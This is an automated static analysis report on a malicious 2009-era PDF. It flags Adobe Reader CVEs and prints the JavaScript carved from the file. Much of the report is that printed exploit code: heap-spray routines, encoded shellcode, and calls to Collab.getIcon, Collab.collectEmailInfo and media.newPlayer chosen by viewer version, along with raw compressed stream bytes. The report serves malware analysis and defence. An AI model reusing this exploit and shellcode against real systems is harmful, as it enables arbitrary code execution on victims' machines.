Malicious PDF — malware analysis report

Static analysis result for SHA-256 38c9f3e2817c5e06…

MALICIOUS

PDF

118.0 KB Created: 2009-12-21 16:55:35 +08:00 Authoring application: Acrobat PDFMaker 7.0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿcer(Acrobat Distiller 7.0 (Windows) (via Acrobat Distiller 7.0 (Windows)) First seen: 2026-05-11
MD5: f49c3e766c351dbd91e971acbd0b23b8 SHA-1: fba956d8cfb577d5467086649152391e2402a852 SHA-256: 38c9f3e2817c5e062eff64f513b784f5adf8874a1886ddd3d2af2603c4da5fce
372 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with high confidence. Heuristics indicate the presence of embedded JavaScript, suggesting an attempt to execute code. The specific intent of the script cannot be determined due to obfuscation, but it is likely to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9982

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     var ret = unescape("%u0c0c%u0c0c");
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/photoshop/1.0/In PDF document text

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0043_000.js pdf-javascript-stream PDF /JS object 43 at offset 0x2430 2172 bytes
SHA-256: 6a4feff50242ca48bccb7b8303874c63d44c492cea43499d20ce94d354dc031d
Preview script
First 1,000 lines of the extracted script
<</Length 2116/Filter[/FlateDecode]>>stream
H�� ko�F� �?� � !EY��%U[ � �"i����^� Kjצ�ב�%�� ���\ʒ�+ �  off�������EV�˅�.V3�̼��Wg �p��n=vz �ޥ� � ;o&�77
Sf�2  b5�p 1PW<E+D�. @��<��:o�l�efk)WŔW|� a�Ʉr� d4n�
`Y���(3� 5Z�+�pK���|�fHg���  Ȗ���ˮ���� Z��6�� 9���Mu{�%z@>3��� 0 � 8j̰\�eU� � ��< >Ŭ��� ��: �e� /��y[ |�6>�+� { �޹r B��*�����6��ZՅ��~_�}�O �S��͖�E5���IՃJQ����5r9߁  ��cG]�
��? ^�8 �JqB�d I  L�x2IR�&�0#��i � �3# 0�
��, � u�HA�JI x  �I �CE ) �" p�r�((%P    )�t � #�S 2ead�<���F E� �� ���ũ��T*j ���ц � �p���HC��- U|�d�j �S��I�J�L#��� ��� !O��d� ��@��gx Lb������  Ir$�&£ &CL`ŧ��1d�� r  �� ��&�	�+9ș�� � 䑺�L6�ޞُځ )  �3"Q�֮%OQ�>�&��r ̩@iQ�i�xv�/}WsJ ct1� �X%�X�@�V  �:<  i"�� й�d � %�hOm�h�%�z G��ٌ���x��A #��� fy��76���- S� ��� gv� j�Q  ,9��h�F	���H��5,�؀3D{m� �0� �c�ڶS����#��N� �cu �OŹ��)9uǡ�g<: �� F�( D�����<U�5O|bzP�=B U���/�n= +����vY� ��t����<�M�# ����6|����Գ+4wۉ�
&l:����  5^H�B�g �詞�mB�N�ּ���~�f�N���w.H�'���V ��8�� d���������xh ���]��?��c;73���I���9-G�)5S]��`O��A/�v| �Z$�_"����2�fO�� �; �VL�滮ݿz� �����V  �W;k{ � i�l��cۗ F6��iL=� ��+?4;�� h�c~JBbf��djE #f0�d�  X�O}י�AK�i~���5�� g���u ����+�zF��*q=�}�N��  ��9� � ���u���լ~�N�j�K	D�l�d� ��y"����m$�n���
�ǂ��8���L��/�]_�ys� x� ��r��|. �z*�_�f<UbX�X�:\�#8��JT��]�>�B��ڻ� TB4F* g��+pd��� �T4��'�)�ظ��5�H�a�ke G�^ Yʂ�u   ��q�d1�3Q� � 0�ɋuL� ��a��	��q���� `J�݀*��&�a� 0��c wc )�P�1TP� ��A�䫳*q�ƌ! ȏ#6��ln�p!6ÙX�T����!� ��S � ��� u �봬�|q㒁�s^;���Q����؍ b�-
�s�&�,�|L.�+�
��e���
7W���c�R ��$a ���|6\��j����w?���  ����??�2 �~���}�K?/g��泜��� �R�=��� � �X�������'?���q����  >o��?��>���f������s U�s �ۼ ��4�C  ��(��z6�.���W٭+���=�PS���+��xQA���z��5�K����!  Q�K � ��؉�� :Fz5� m��~@ �ZOI
� Pm���j��<��Q>�|\���ѐ2U�T�j�A�*9 cl��g�  �TElpXFO��	B~&f�p� 	� B � ��쀋���� '���ǎ �ݳm�g
 k �]�2 0 ���S��w��O�g� 7� 7d�$_��
� ��*w��p�$�� � �N O��Cي��R���� ,` ��g:�xݲ�n �좽- 3���e*��Z4�b����q�x�y
? ~#M�e�� S�` = ��V�����Vy�T�������A����~EV��� �������[�p��O ���   W�@<�k�?_�+�� ��� �J  >�4!k � p4�rY cJQ�#��_֕��۳7�a� �ܱґpy� i�#J��N�ɱ���Cif� �x��?22� �Xy�Iu�tz�5� �F���C��4�Lh����3CE��m��GoY�{|j8T �.� L�"�
endstrea
javascript_obj0043_001.js pdf-javascript-stream PDF /JS object 43 at offset 0x2465 6463 bytes
SHA-256: 72a7a81874bc825243697fb1380a9dc969da68bf826f90ff5241fdd360dd07a9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function urpl(sc){
	var keyu= "%u";
	var re = /XX/g;
	sc = sc.replace(re,keyu);
	return sc;
}

function xxsc(sc){
	var sprdataxx = "XX4a4bXX4647";
	var esprpl=unescape;
	var urpled = esprpl(urpl(sc));
	var blknum = 0x41000;
	var sprdata = esprpl(urpl(sprdataxx));
	while(sprdata.length<blknum)
		sprdata+=sprdata;
	sprblk=sprdata.substring(0,sprdata.length);
	scblk=urpled.substring(0,urpled.length);
	memory=new Array();
	var k = 0;
	while (k < 200)
	{
		memory[k]=sprblk+scblk;
		k++;
	}
}

function repeat(count,what){
	var v = "";
	while (--count >= 0) v += what;
	return v;
}

var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX4864XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"


function exp8() {
	var spd = "XX000aXX000aXX000aXX000a";
	var esc = unescape;
	var spr = esc(urpl(spd));

	var of = repeat(4096, spr);
	var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
		Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}

function exp9() {	
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	var ret = unescape("%u0c0c%u0c0c");
	var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");

	while(ret.length <= 0x8000) ret+=ret;
	ret=ret.substring(0,0x8000 - s.length);
	memory=new Array();

	for(i=0;i<0x2000;i++) {
		memory[i]= ret + sc;
	}

	util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
	util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
	try {this.media.newPlayer(null);} catch(e) {}
	util.printd(sc2, new Date());

}

function start() 
{
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	if (app.viewerVersion >= 7.0)
	{
		plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
	} 
	else 
	{
		ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
		plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
		+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
		while ((plin.length % 8) != 0) 
		plin = unescape("%u4141") + plin;

		plin += repeat(2626,ef6);
	}
	if (app.viewerVersion >= 6.0)
	{
	  var a=[];//javascript for adobe
	  Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
	}
}


var ver = app.viewerVersion

if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
	var inBrowser = this.external;
	if (inBrowser)
		var shaft = app.setTimeOut("exp9()",1200);
	else
		exp9();	
}
else
{
	if(ver >= 8.0)
	{
		xxsc(s);

		var inBrowser = this.external;
		if (inBrowser)
			var shaft = app.setTimeOut("exp8()",1200);
		else
			exp8();
	}
	else 
	{
		if(ver >= 6.0)
		{
			var inBrowser = this.external;
			if (inBrowser)
				var shaft = app.setTimeOut("start()",1200);
			else
				start();
		}
		else
		{
			while(1){};
		}
	}
}
javascript_obj0043_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 43 at offset 0x2465 72 bytes
SHA-256: 1d18be7a9a735b4efb9816cbf36ca8f2995fa7e3951c97e5ce9977168aa1280b
generic_stage_recovery_000.js deobfuscated-js generic stage recovery marker-XX-to-%u from combined JavaScript objects at offset 0x2430 5838 bytes
SHA-256: 16ae11897d85015a75a4476aa5d780ff0fb25880746f1a6e954a1c4f5329200c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"


function exp8() {
	var spd = "%u000a%u000a%u000a%u000a";
	var esc = unescape;
	var spr = esc(urpl(spd));

	var of = repeat(4096, spr);
	var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
		Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}

function exp9() {	
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	var ret = unescape("%u0c0c%u0c0c");
	var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");

	while(ret.length <= 0x8000) ret+=ret;
	ret=ret.substring(0,0x8000 - s.length);
	memory=new Array();

	for(i=0;i<0x2000;i++) {
		memory[i]= ret + sc;
	}

	util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
	util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
	try {this.media.newPlayer(null);} catch(e) {}
	util.printd(sc2, new Date());

}

function start() 
{
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	if (app.viewerVersion >= 7.0)
	{
		plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
	} 
	else 
	{
		ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
		plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
		+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
		while ((plin.length % 8) != 0) 
		plin = unescape("%u4141") + plin;

		plin += repeat(2626,ef6);
	}
	if (app.viewerVersion >= 6.0)
	{
	  var a=[];//javascript for adobe
	  Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
	}
}


var ver = app.viewerVersion

if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
	var inBrowser = this.external;
	if (inBrowser)
		var shaft = app.setTimeOut("exp9()",1200);
	else
		exp9();	
}
else
{
	if(ver >= 8.0)
	{
		xxsc(s);

		var inBrowser = this.external;
		if (inBrowser)
			var shaft = app.setTimeOut("exp8()",1200);
		else
			exp8();
	}
	else 
	{
		if(ver >= 6.0)
		{
			var inBrowser = this.external;
			if (inBrowser)
				var shaft = app.setTimeOut("start()",1200);
			else
				start();
		}
		else
		{
			while(1){};
		}
	}
}
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x2430 8636 bytes
SHA-256: 6b274891890bf0d519e3384adb17e8bb7394a4452b3b364e01a340896daea0d1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
<</Length 2116/Filter[/FlateDecode]>>stream
H�� ko�F� �?� � !EY��%U[ � �"i����^� Kjצ�ב�%�� ���\ʒ�+ �  off�������EV�˅�.V3�̼��Wg �p��n=vz �ޥ� � ;o&�77
Sf�2  b5�p 1PW<E+D�. @��<��:o�l�efk)WŔW|� a�Ʉr� d4n�
`Y���(3� 5Z�+�pK���|�fHg���  Ȗ���ˮ���� Z��6�� 9���Mu{�%z@>3��� 0 � 8j̰\�eU� � ��< >Ŭ��� ��: �e� /��y[ |�6>�+� { �޹r B��*�����6��ZՅ��~_�}�O �S��͖�E5���IՃJQ����5r9߁  ��cG]�
��? ^�8 �JqB�d I  L�x2IR�&�0#��i � �3# 0�
��, � u�HA�JI x  �I �CE ) �" p�r�((%P    )�t � #�S 2ead�<���F E� �� ���ũ��T*j ���ц � �p���HC��- U|�d�j �S��I�J�L#��� ��� !O��d� ��@��gx Lb������  Ir$�&£ &CL`ŧ��1d�� r  �� ��&�	�+9ș�� � 䑺�L6�ޞُځ )  �3"Q�֮%OQ�>�&��r ̩@iQ�i�xv�/}WsJ ct1� �X%�X�@�V  �:<  i"�� й�d � %�hOm�h�%�z G��ٌ���x��A #��� fy��76���- S� ��� gv� j�Q  ,9��h�F	���H��5,�؀3D{m� �0� �c�ڶS����#��N� �cu �OŹ��)9uǡ�g<: �� F�( D�����<U�5O|bzP�=B U���/�n= +����vY� ��t����<�M�# ����6|����Գ+4wۉ�
&l:����  5^H�B�g �詞�mB�N�ּ���~�f�N���w.H�'���V ��8�� d���������xh ���]��?��c;73���I���9-G�)5S]��`O��A/�v| �Z$�_"����2�fO�� �; �VL�滮ݿz� �����V  �W;k{ � i�l��cۗ F6��iL=� ��+?4;�� h�c~JBbf��djE #f0�d�  X�O}י�AK�i~���5�� g���u ����+�zF��*q=�}�N��  ��9� � ���u���լ~�N�j�K	D�l�d� ��y"����m$�n���
�ǂ��8���L��/�]_�ys� x� ��r��|. �z*�_�f<UbX�X�:\�#8��JT��]�>�B��ڻ� TB4F* g��+pd��� �T4��'�)�ظ��5�H�a�ke G�^ Yʂ�u   ��q�d1�3Q� � 0�ɋuL� ��a��	��q���� `J�݀*��&�a� 0��c wc )�P�1TP� ��A�䫳*q�ƌ! ȏ#6��ln�p!6ÙX�T����!� ��S � ��� u �봬�|q㒁�s^;���Q����؍ b�-
�s�&�,�|L.�+�
��e���
7W���c�R ��$a ���|6\��j����w?���  ����??�2 �~���}�K?/g��泜��� �R�=��� � �X�������'?���q����  >o��?��>���f������s U�s �ۼ ��4�C  ��(��z6�.���W٭+���=�PS���+��xQA���z��5�K����!  Q�K � ��؉�� :Fz5� m��~@ �ZOI
� Pm���j��<��Q>�|\���ѐ2U�T�j�A�*9 cl��g�  �TElpXFO��	B~&f�p� 	� B � ��쀋���� '���ǎ �ݳm�g
 k �]�2 0 ���S��w��O�g� 7� 7d�$_��
� ��*w��p�$�� � �N O��Cي��R���� ,` ��g:�xݲ�n �좽- 3���e*��Z4�b����q�x�y
? ~#M�e�� S�` = ��V�����Vy�T�������A����~EV��� �������[�p��O ���   W�@<�k�?_�+�� ��� �J  >�4!k � p4�rY cJQ�#��_֕��۳7�a� �ܱґpy� i�#J��N�ɱ���Cif� �x��?22� �Xy�Iu�tz�5� �F���C��4�Lh����3CE��m��GoY�{|j8T �.� L�"�
endstrea 

function urpl(sc){
	var keyu= "%u";
	var re = /XX/g;
	sc = sc.replace(re,keyu);
	return sc;
}

function xxsc(sc){
	var sprdataxx = "XX4a4bXX4647";
	var esprpl=unescape;
	var urpled = esprpl(urpl(sc));
	var blknum = 0x41000;
	var sprdata = esprpl(urpl(sprdataxx));
	while(sprdata.length<blknum)
		sprdata+=sprdata;
	sprblk=sprdata.substring(0,sprdata.length);
	scblk=urpled.substring(0,urpled.length);
